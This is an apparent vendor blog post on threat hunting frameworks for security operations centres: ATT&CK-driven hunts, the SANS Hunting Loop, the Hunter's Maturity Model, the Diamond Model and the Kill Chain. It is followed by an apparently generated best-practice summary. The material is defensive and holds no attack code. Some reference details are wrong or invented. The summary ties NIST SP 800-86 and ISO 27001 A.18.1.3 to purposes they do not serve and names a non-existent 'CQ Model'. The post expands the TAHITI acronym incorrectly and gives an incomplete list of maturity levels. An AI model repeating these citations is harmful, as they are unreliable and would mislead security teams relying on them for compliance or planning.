Full Report
Threat hunting has become one of the most important activities in modern security operations. In an age where adversaries innovate constantly, waiting for alerts is not enough. A mature SOC must be proactive, searching for adversaries before they trigger alarms, and validating whether defences truly work against real-world tactics.Threat-informed defence is the philosophy that underpins this approach. Instead of hunting based on hunches or generic indicators, teams use structured frameworks that tie hunts to adversary behaviour. This blog explores why threat hunting matters, the major frameworks you can adopt, what makes a hunt successful, and common pitfalls to avoid.Why Threat Hunting MattersAttackers Move Faster than Defenders: Threat actors exploit gaps in visibility, misconfigurations, and novel tactics, techniques and procedures (TTPs). By the time an alert fires, damage may already be done. Hunting helps you catch these subtle intrusions earlier.Detection Gaps Are Inevitable: No matter how advanced your tools, there will be blind spots. Threat hunting exposes those gaps and feeds improvements back into detection engineering.SOC Maturity and Analyst Skill Growth: Hunting develops analyst expertise, strengthens defensive posture, and transitions the SOC from reactive firefighting to proactive security.The Main Threat Hunting FrameworksDifferent organisations have proposed structured methodologies for threat hunting. Here are the most prominent:MITRE ATT&CK®-Driven HuntingThe MITRE ATT&CK® framework is one of the most widely adopted tools for structuring threat hunts. Rather than starting from scratch, analysts can anchor their hunts in a globally recognised catalogue of adversary tactics and techniques. ATT&CK doesn’t just tell you what attackers do, it provides a roadmap for how to detect them.A typical ATT&CK-driven hunting process follows these steps:Select Relevant Tactics and Techniques: Start by choosing ATT&CK techniques based on your threat model, recent intelligence, or adversary profiles. For example, if your organisation is targeted by ransomware actors, you might focus on techniques in the Execution and Impact tactics.Form a Hypothesis: Translate the chosen technique into a hypothesis. For instance: “An adversary may be using PowerShell (T1059.001) for initial execution in our environment.”Map to Available Data Sources: Use ATT&CK’s guidance on data sources to determine what telemetry you’ll need. For PowerShell execution, this might include process creation logs, PowerShell operational logs, or endpoint telemetry.Hunt in the Environment: Build queries or detections in your SIEM/EDR to test the hypothesis. Look for activity matching the ATT&CK technique, such as unusual PowerShell command lines.Investigate and Enrich: If suspicious activity is found, enrich it with context: when did it occur, which accounts were involved, is it tied to known adversary campaigns?Operationalise Findings: Feed validated findings back into your detection engineering process, for example, creating a new SIEM rule, EDR detection, or SOAR playbook mapped directly to the ATT&CK technique.Measure Coverage: Document which ATT&CK techniques are now covered, identify remaining gaps, and plan the next hunt. Over time, this builds a measurable “ATT&CK coverage map” of your environment.SANS Threat Hunting Process (The Hunting Loop)The SANS Institute’s Threat Hunting Loop provides a structured, repeatable process for hunts. It is an intelligence-driven methodology, but with defined stages that make it more than just using threat intel. The loop consists of:Hypothesis Generation: Starting with a question based on threat intelligence or observed activity.Profiling the Environment: Establishing baselines of normal behaviour to spot anomalies.Hunting: Actively testing the hypothesis by querying available data sources.Discovery and Enrichment: Investigating findings, correlating with other data, and gathering context.Operationalisation: Feeding discoveries back into detections, dashboards, or playbooks to strengthen defences.This cyclical process ensures hunts not only identify potential threats but also continuously improve detection capabilities.Hunter’s Maturity Model (HMM)The Hunter’s Maturity Model (HMM) was developed by Sqrrl, later acquired by Amazon and integrated into AWS’s security services. HMM outlines stages of hunting maturity:Level 0: No hunting, reactive operations only.Level 1: Unstructured, ad hoc hunts.Level 2: Structured, repeatable hunts.Level 3: Proactive, automated, and innovative hunts.This model remains a widely used way for SOCs to benchmark where they are on their hunting journey and chart a path toward maturity.Analytic Frameworks for Guiding Hunts (Diamond Model and Kill Chain)Diamond Model for Intrusion Analysis: Focuses on four nodes, adversary, capability, infrastructure, and victim, and the relationships between them. Analysts can pivot across these nodes to generate hypotheses and better understand adversary behaviour.Cyber Kill Chain® (Lockheed Martin): Breaks down an adversary attack into seven phases: reconnaissance, weaponisation, delivery, exploitation, installation, command and control, and actions on objectives. It helps hunters frame their work by asking: “At which phase are we most likely to detect this activity in our environment?”While not frameworks for TTPs in the same sense as MITRE ATT&CK, both models give analysts useful structures to guide hunts and anticipate adversary behaviour.TAHITI Methodology (Emerging)Some SOC teams adopt lightweight, iterative hunting methods inspired by frameworks like TAHITI (Threat-Informed Analysis for Tactical Hunts and Investigations). While not as widely formalised or adopted as ATT&CK or the SANS Loop, these approaches emphasise:Short cycles of hypothesis and testingRapid feedback into detectionsFlexibility over rigid processThis style suits agile teams who want fast results without the overhead of a full formal framework.What Makes Threat Hunting SuccessfulClear Hypotheses: Hunts should start with a focused, testable question (e.g., “Are adversaries using living-off-the-land binaries to move laterally in our network?”).Threat Intelligence Integration: Quality cyber threat intelligence provides the seed for relevant hunts and ensures defenders are testing against real-world TTPs.Data Coverage and Visibility: Hunts are only as strong as the telemetry available, endpoint, network, cloud, and identity data must be ingested and searchable.Repeatability and Documentation: Each hunt should produce lessons learned, new detections, and playbooks for future use.Feedback Loop to Detection Engineering: Findings from hunts must feed directly into SIEM/SOAR detections, improving resilience over time.Common Pitfalls to AvoidUnstructured “Fishing Expeditions”: Hunting without hypotheses wastes time and erodes analyst confidence.Over-Reliance on Tools Alone: Technology supports hunting, but analyst curiosity and critical thinking are irreplaceable.Failure to Operationalise Results: If hunts don’t improve detection coverage or incident response, they’re wasted effort.Not Measuring Value: Without metrics, such as detection coverage improvements, dwell time reduction, or successful hypothesis validation, executive buy-in may fade.Burnout and Scope Creep: Analysts tasked with constant ad hoc hunts without a process risk fatigue and inconsistent outcomes.Bringing It All Together: Threat-Informed DefenceThreat-informed defence is the practice of grounding your security operations in a clear understanding of how adversaries actually operate. Instead of building defences around generic risks or vendor-driven priorities, you align security controls, detection engineering, and response playbooks to real-world adversary TTPs.In this model, frameworks like MITRE ATT&CK, the Diamond Model, and the SANS Hunting Loop aren’t academic exercises, they are the scaffolding that keeps your defence program anchored to reality.Where threat hunting fits:Threat hunting becomes the validation engine for threat-informed defence.By testing hypotheses against adversary TTPs, hunts reveal whether your environment can detect and withstand those behaviours.Every hunt produces lessons learned: gaps in telemetry, missing detections, or untested assumptions. Those lessons feed back into detection engineering and defensive controls.Over time, this cycle ensures your defences are not just theoretical but battle-tested against the threats that matter most to you.Put simply: threat-informed defence sets the strategy, and threat hunting executes it in practice. The result is a SOC that no longer waits for attackers to announce themselves but continuously checks whether its defences stand up to the adversaries most likely to come knocking.The Role of Cyber Threat Intelligence in Threat HuntingThreat hunting is only as strong as the intelligence it’s built on. Too often, “threat intelligence” is treated as a feed of indicators of compromise (IOCs), IP addresses, file hashes, or domain names. While IOCs can support detection, they cannot drive threat hunting. By the time an IOC is distributed, it may already be obsolete, burned, or irrelevant to your environment. Hunting based on these alone quickly becomes a game of whack-a-mole.Real threat hunting requires intelligence that answers bigger questions:Which threat actors are likely to target my industry and geography? Understanding the adversaries most relevant to your organisation ensures you’re not chasing ghosts, but focusing on real risks.Which techniques do those adversaries use? Mapping adversary behaviour to frameworks like MITRE ATT&CK highlights where you should focus your hunts and what data you’ll need.When were those techniques and campaigns active? Bounding intelligence in timeframes matters. Techniques used three years ago may not be relevant today, while emerging campaigns might demand immediate hunts.Good intelligence informs what to hunt, when to hunt it, and why it matters. This elevates hunting from ad hoc curiosity to a strategic capability.Arachne Digital provides intelligence that goes beyond static indicators. Our threat intelligence highlights the adversaries most likely to target you, the techniques they employ, and the industries and regions they focus on, all bounded in time. This is the type of intelligence that fuels proactive hunts, closes detection gaps, and enables threat-informed defence.Reach out to us for more details.Final ThoughtsThreat hunting is one of the clearest signs of SOC maturity. It demands curiosity, structure, and a willingness to learn from both successes and failures. Whether you start with ATT&CK, intelligence-driven hunts, or a maturity model, the key is to build a repeatable process that grows with your organisation.These insights are not abstract theory, they’re the foundation of how modern defenders close detection gaps, validate assumptions, and build resilience against today’s adversaries.
Analysis Summary
# Best Practices: Implementing Proactive Threat Hunting for SOC Maturity
## Overview
These practices focus on transitioning Security Operations Centers (SOCs) from purely reactive alert handling to proactive security operations through structured threat hunting. This shift, underpinned by the philosophy of "threat-informed defence," aims to uncover latent threats, validate existing defenses against real-world adversary tactics, techniques, and procedures (TTPs), and systematically reduce detection gaps.
## Key Recommendations
### Immediate Actions
1. **Establish Threat Hunting as an Official SOC Function:** Dedicate time and resources explicitly for threat hunting activities, moving beyond treating it as an 'optional' task.
2. **Adopt a Structured Framework:** Immediately select a recognized framework (e.g., MITRE ATT&CK, SANS Hunting Loop) to structure the first few hunting cycles, avoiding ad-hoc activities.
3. **Baseline Normal Operations:** Begin profiling current environment telemetry (e.g., process execution, network flows) to establish initial benchmarks for anomaly detection.
### Short-term Improvements (1-3 months)
1. **Implement MITRE ATT&CK-Driven Scoping:** Select high-priority tactics/techniques relevant to your industry/geography (based on threat intelligence) and use them as the foundation for initial hypotheses.
2. **Develop Initial Hypothesis Templates:** For selected ATT&CK techniques (e.g., T1059.001 - PowerShell Execution), create repeatable templates for hypothesis generation, data source mapping, and query construction.
3. **Operationalize First Successful Hunts:** For any validated findings (new threat activity or detection gaps), immediately create or tune SIEM rules, EDR detections, or SOAR playbooks mapped directly to the identified technique.
4. **Implement Initial Maturity Assessment:** Use the Hunter’s Maturity Model (HMM) to benchmark the current SOC state (Level 0 to Level 2 being the immediate goal).
### Long-term Strategy (3+ months)
1. **Integrate Real-Time Threat Intelligence:** Shift "threat intelligence" consumption from solely relying on potentially obsolete Indicators of Compromise (IOCs) to intelligence focused on *which threat actors are targeting your industry* and *which techniques they employ*.
2. **Establish Continuous Coverage Measurement:** Systematically document and track which ATT&CK techniques have corresponding detections/controls, visualizing the organization's current "ATT&CK coverage map" to prioritize gap remediation.
3. **Automate Triage and Enrichment:** Evolve hunts toward Level 3 HMM maturity by integrating automated enrichment steps into the investigation phase of the hunting loop (e.g., automatically correlating findings with vulnerability data or internal asset context).
4. **Develop Adversary Simulation (Purple Teaming):** Schedule regular engagements where threat hunting hypotheses are tested against live systems using known adversary TTPs to validate real-world defense effectiveness.
## Implementation Guidance
### For Small Organizations
- **Start Simple with SANS Loop:** Utilize the SANS Hunting Loop as it integrates naturally with existing intelligence feeds and focuses on a repeatable process without requiring extensive internal framework mapping initially.
- **Focus on High-Fidelity Telemetry:** Prioritize hunting on endpoints (EDR/Sysmon) and essential identity logs (Active Directory/Azure AD), as these provide the highest return on investment for initial hunts.
- **Leverage Existing Tooling:** Frame hypothesis testing queries directly within your existing SIEM or EDR solutions; avoid investing in new specialized threat hunting platforms initially.
### For Medium Organizations
- **Mandate ATT&CK Mapping:** Adopt the MITRE ATT&CK framework as the primary organizational standard for mapping hunts to adversary behaviour.
- **Formalize the Feedback Loop:** Designate a role or a recurring meeting to ensure that validated findings flow directly to the Detection Engineering team for formalizing new security controls.
- **Begin Profiling Baselines:** Dedicate time to build definitive baselines for critical systems (e.g., domain controllers, primary web servers) to improve the ‘Profiling the Environment’ stage of the hunting loop.
### For Large Enterprises
- **Horizontal and Vertical Coverage:** Ensure hunts cover techniques across multiple security domains (Endpoint, Cloud, Network, Identity) guided by comprehensive Tier-1/Tier-2 CTI reports.
- **Implement HMM Progression:** Actively manage the transition from Level 2 (structured) to Level 3 (proactive/innovative) by allocating R&D time for analysts to explore novel detection techniques not covered by standard alerts.
- **Integrate Analytic Models:** Use the Diamond Model for deep-dive anomaly investigation to pivot hypotheses based on identified infrastructure or adversary capabilities, moving beyond simple TTP identification.
## Configuration Examples
*No specific technical configurations were provided in the source text. Below are conceptual mappings based on the methodology:*
| Hypothesis Example (ATT&CK Driven) | Data Source Focus | Detection Logic Target |
| :--- | :--- | :--- |
| Hypothesis: An adversary is using encoded PowerShell commands for persistence (T1059.001). | PowerShell Operational Logs (Event ID 4104/4103) | Query for command lines containing base64 encoding, excessive length, or known obfuscation strings. |
| Hypothesis: An external attacker is performing internal reconnaissance via remote access tools (T1021). | Endpoint Process Creation Logs (Sysmon Event ID 1) & Firewall Logs | Correlate external IP connections with the spawning of common remote access binaries (e.g., TeamViewer, RDP connections originating from unusual user accounts). |
## Compliance Alignment
- **NIST SP 800-86:** Aligning processes for integrating threat intelligence with defensive actions.
- **MITRE ATT&CK®:** The core framework driving the selection, structuring, and measurement of hunting activities.
- **ISO/IEC 27001 (A.18.1.3):** Utilizing threat intelligence specific to the organization to inform risk assessment and continuous monitoring activities.
- **CQ Model (Hunter’s Maturity Model):** Used for self-assessing and charting the maturity of the security monitoring function.
## Common Pitfalls to Avoid
- **Chasing "Whack-a-Mole" IOCs:** Do not base hunts solely on static, non-contextual IOC feeds; this is reactive and quickly outdated. Focus on tactics and techniques.
- **Lack of Structure:** Avoid conducting hunts based only on intuition or hunches. Every hunt must start with a defined hypothesis anchored to a relevant adversary profile or known detection gap.
- **No Feedback Loop:** Failing to operationalize successful findings results in wasted effort. Ensure every discovery leads directly to an improvement in automated detections or defensive posture documentation.
- **Neglecting Contextual Intelligence:** Ignoring industry relevance. Do not waste resources hunting for techniques used by actors irrelevant to your industry or geography.
## Resources
- **MITRE ATT&CK Framework:** The primary reference for adversary TTPs and associated data sources.
- **SANS Threat Hunting Loop Documentation:** Provides detailed methodology for repeatable hunting cycles.
- **Hunter’s Maturity Model (HMM):** Used for benchmarking and charting SOC evolution.
- **Diamond Model for Intrusion Analysis:** Useful for structuring deep investigations around identified events.
- **Cyber Kill Chain® (Lockheed Martin):** Provides a phased approach to framing detection opportunities across the attack lifecycle.